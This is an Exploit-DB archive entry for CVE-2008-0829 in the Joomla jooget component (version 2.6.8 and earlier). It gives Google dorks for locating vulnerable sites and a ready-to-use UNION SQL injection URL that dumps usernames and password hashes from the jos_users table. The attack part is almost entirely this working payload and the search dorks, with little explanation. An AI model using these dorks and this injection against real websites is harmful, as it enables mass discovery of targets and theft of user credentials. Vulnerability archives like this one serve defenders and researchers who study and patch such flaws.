Joomla Component jooget <= 2.6.8 - Remote SQL Injection Vulnerability

2008-02-16T00:00:00
ID EDB-ID:5132
Type exploitdb
Reporter S@BUN
Modified 2008-02-16T00:00:00

Description

Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability. CVE-2008-0829. Webapps exploit for php platform

                                        
                                            ###############################################################
#
# joomla SQL Injection(com_jooget)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: id "com_jooget"
#
# DORK 2 : allinurl: detail "com_jooget"
#
   DORK 3 : allinurl: "com_jooget"

################################################################
EXPLOIT :

index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

################################################################
# S@BUN               i AM NOT HACKER               S@BUN
################################################################

&lt;name&gt;jooget&lt;/name&gt;
  &lt;creationDate&gt;15.07.2007&lt;/creationDate&gt;
  &lt;author&gt;joomlapixel&lt;/author&gt;
   &lt;authorEmail&gt;info@joomlapixel.eu&lt;/authorEmail&gt;
  &lt;authorUrl&gt;www.joomlapixel.eu&lt;/authorUrl&gt;

  &lt;version&gt;2.6.8&lt;/version&gt;
  &lt;description&gt;jooget!download manager semplificato per joomla!.&lt;/description&gt;

# milw0rm.com [2008-02-16]